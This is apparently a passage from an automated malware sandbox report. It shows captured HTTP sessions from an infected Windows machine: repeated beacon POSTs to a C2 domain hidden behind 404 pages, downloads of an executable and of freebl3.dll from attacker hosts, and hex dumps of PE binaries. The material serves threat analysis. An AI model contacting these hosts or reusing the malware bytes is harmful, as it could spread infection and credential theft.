73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:01.466888905 CEST	16468	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:01.516072035 CEST	16468	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 42 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 00 00 a7 a2 7f d5 7f 6b 10 19 36 87 8f bf a7 46 90 6c 01 45 fc 39 0d 14 62 da 02 52 f8 bf 97 c8 20 8c 91 ea 4d 83 8e a6 e6 5a Data Ascii: k6FlE9bR MZ
Aug 24, 2021 08:47:03.645734072 CEST	16885	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:03.696919918 CEST	16886	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:03.849823952 CEST	16887	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:03.895261049 CEST	16888	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:04.100789070 CEST	16888	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:04.149142027 CEST	16889	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:06.080440998 CEST	16889	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:06.127907991 CEST	16890	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:47:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=3

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49716	172.67.216.236	80	C:\Users\user\AppData\Local\Temp\C481.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:46:54.290574074 CEST	11284	OUT	GET /@Rarenut0.exe HTTP/1.1 Host: swretjhwrtj.gq Connection: Keep-Alive
Aug 24, 2021 08:46:54.318861008 CEST	11285	IN	HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 06:46:54 GMT Content-Type: application/x-msdos-program Content-Length: 109568 Connection: keep-alive last-modified: Mon, 23 Aug 2021 18:01:19 GMT etag: "1ac00-5ca3dcddc8b80" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4814 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=is2oWOO2oj%2BNqabws35LFSDZfrh5u84YrEC%2FATRWy%2FFcrqsmqoXeYCGEPtsP3gIx4o%2B030evq0RmcitB2lDIMdnVTjGqGvyHIJB8hGCilbEDjEojJKyOC9X%2BMfqKUXmbqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 683aa04d5b781766-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 4b b7 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 01 00 00 0c 00 00 00 00 00 00 aa a6 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a6 01 00 4f 00 00 00 00 c0 01 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 3c a6 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 98 01 00 00 20 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 04 00 00 00 c0 01 00 00 08 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 04 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZK0 @ @XO< H.text `.rsrc@@.reloc@B
Aug 24, 2021 08:46:54.318886995 CEST	11287	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Aug 24, 2021 08:46:54.318902016 CEST	11288	IN	Data Raw: 00 01 02 00 00 00 9b 00 00 00 21 02 00 00 bc 02 00 00 0e 00 00 00 00 00 00 00 02 00 00 00 31 00 00 00 a6 02 00 00 d7 02 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 dd 02 00 00 e3 02 00 00 03 00 00 00 0a 00 00 01 1b 30 04 00 7c 01 00 00 Data Ascii: !10\|s7R%(s(8(9-G(sosR%(so&8s?oo:o:o
Aug 24, 2021 08:46:54.318921089 CEST	11289	IN	Data Raw: 00 00 04 28 1e 00 00 0a 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2d 07 06 0d dd 32 01 00 00 02 28 08 00 00 06 0c 73 e8 00 00 06 13 04 11 04 07 6f e1 00 00 06 73 a3 00 00 06 13 05 11 05 1e 8d 52 00 00 01 25 d0 a7 00 00 04 28 1e 00 00 0a Data Ascii: (s(8(9-2(sosR%(so&8R%(soo:R%(so?-R%(so?,(sR%(
Aug 24, 2021 08:46:54.318937063 CEST	11291	IN	Data Raw: 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2d 2e 09 17 58 0d 38 57 ff ff ff 09 19 40 50 ff ff ff 02 1f 0f 8d 52 00 00 01 25 d0 df 00 00 04 28 1e 00 00 0a 73 1f 00 00 0a 28 38 00 00 0a 0b 07 28 39 00 00 0a 2c 30 73 e8 00 00 06 13 04 07 28 Data Ascii: s(8(9-.X8W@PR%(s(8(9,0s(R(+oo,o&&AL-81=0}s7R%(s
Aug 24, 2021 08:46:54.318948984 CEST	11292	IN	Data Raw: 2a 00 00 00 41 64 00 00 02 00 00 00 7a 00 00 00 de 00 00 00 58 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 3d 00 00 00 2b 01 00 00 68 01 00 00 03 00 00 00 0a 00 00 01 02 00 00 00 31 00 00 00 47 01 00 00 78 01 00 00 0a 00 00 00 00 00 00 00 00 00 Data Ascii: *AdzX=+h1Gx~0s>R%(s(8(9-sosR%(so&8as/
Aug 24, 2021 08:46:54.318967104 CEST	11293	IN	Data Raw: 3b 00 00 0a 2d 6e 11 0b 28 3b 00 00 0a 2d 65 28 61 00 00 0a 11 0a 28 4b 00 00 0a 6f 62 00 00 0a 13 0c 28 61 00 00 0a 11 0b 28 4b 00 00 0a 6f 62 00 00 0a 11 0c 17 14 28 23 00 00 06 13 0d 17 14 28 23 00 00 06 13 0e 11 0d 28 3b 00 00 0a 2d 24 11 0e Data Ascii: ;-n(;-e(a(Kob(a(Kob(#(#(;-$(;-s?%o<%o>o=&Xi?Xi?&*A4"(c0?rop
Aug 24, 2021 08:46:54.318981886 CEST	11295	IN	Data Raw: 00 0a 02 6f 70 00 00 0a 0a 06 6f 7d 00 00 0a 28 26 00 00 06 72 b0 03 00 70 7e 22 00 00 0a 6f 48 00 00 0a 2a 13 30 03 00 bd 00 00 00 18 00 00 11 7e 22 00 00 0a 0a 16 0b 38 a2 00 00 00 02 07 6f 7e 00 00 0a 25 1f 0f 5f 0c 1a 63 1f 0f 5f 0d 09 1f 09 Data Ascii: opo}(&rp~"oH0~"8o~%_c_1YAX(((,+(((,1YAX(((,+(((,Xo.X]-rp(,Xo?R0
Aug 24, 2021 08:46:54.319000959 CEST	11296	IN	Data Raw: 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 01 00 00 04 03 6f fe 00 00 06 0a de 05 26 16 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 0f 0f 00 05 0f 00 00 01 1b 30 02 00 16 00 00 00 1c 00 00 11 02 7b 01 00 00 04 03 6f 08 01 00 06 Data Ascii: 0{o&0{o&0{o&0{o&0{o&
Aug 24, 2021 08:46:54.319019079 CEST	11297	IN	Data Raw: ef 00 00 06 2d 03 16 2b 01 17 28 a2 00 00 0a 13 06 16 13 07 2b 56 11 06 11 07 9a 13 08 06 11 08 6f 25 00 00 0a 73 92 01 00 06 25 09 11 05 11 08 6f f4 00 00 06 6f 9c 01 00 06 25 09 6f f2 00 00 06 28 3b 00 00 0a 2d 08 09 6f f2 00 00 06 2b 07 11 05 Data Ascii: -+(+Vo%s%oo%o(;-o+ooo&Xi2&o:\,o&Xi?&&*@aF. 0
Aug 24, 2021 08:46:54.319694042 CEST	11299	IN	Data Raw: 11 11 6f aa 00 00 0a 16 6a 3e 86 00 00 00 11 11 6f aa 00 00 0a 11 08 30 7b 07 20 00 00 20 03 6a 2f 72 11 11 6f 24 00 00 0a 6f 25 00 00 0a 17 8d 51 00 00 01 25 16 18 8d 52 00 00 01 25 16 1f 3a 9d 25 17 1f 5c 9d 73 1f 00 00 0a a2 17 6f 4e 00 00 0a Data Ascii: oj>o0{ j/ro$o%Q%R%:%\soNo%s%,i0~"+o%oooX&o:I,o&o:D,o&*A

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49719	188.34.200.103	80	C:\Users\user\AppData\Local\Temp\CA2F.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:46:57.855310917 CEST	14202	OUT	POST /824 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 188.34.200.103 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Aug 24, 2021 08:46:57.973056078 CEST	14202	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 3d 8c c1 0e c2 20 0c 86 9f 66 17 62 08 cc 78 81 a3 7a f2 30 13 e7 cd 4b 05 9c cb 20 10 28 ce bd bd 8c 25 f6 4f fa 7d 4d da f2 1d ff 87 95 ac 6c 0f 85 6b c9 e6 74 be 5d fa ee da 3c 24 a1 f8 45 41 a8 86 d2 67 b0 d6 20 a1 44 90 f6 05 95 4f 50 53 0e 55 95 d7 a6 4a 80 94 66 1f 75 1d 20 e3 bb ca e0 fd 60 b7 85 8c aa f2 de 1f b7 cb b8 84 ed ed 64 96 42 c9 19 93 18 b3 91 ce 7f 46 93 84 cb 69 54 c2 85 bd fc 01 a5 24 5a 32 b9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 99= fbxz0K (%O}Mlkt]<$EAg DOPSUJfu `dBFiT$Z20
Aug 24, 2021 08:46:58.006998062 CEST	14203	OUT	GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:46:58.027499914 CEST	14204	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:58 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:46:58 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Aug 24, 2021 08:46:58.027529001 CEST	14206	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8 Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
Aug 24, 2021 08:46:58.027551889 CEST	14207	IN	Data Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75 Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
Aug 24, 2021 08:46:58.027578115 CEST	14208	IN	Data Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
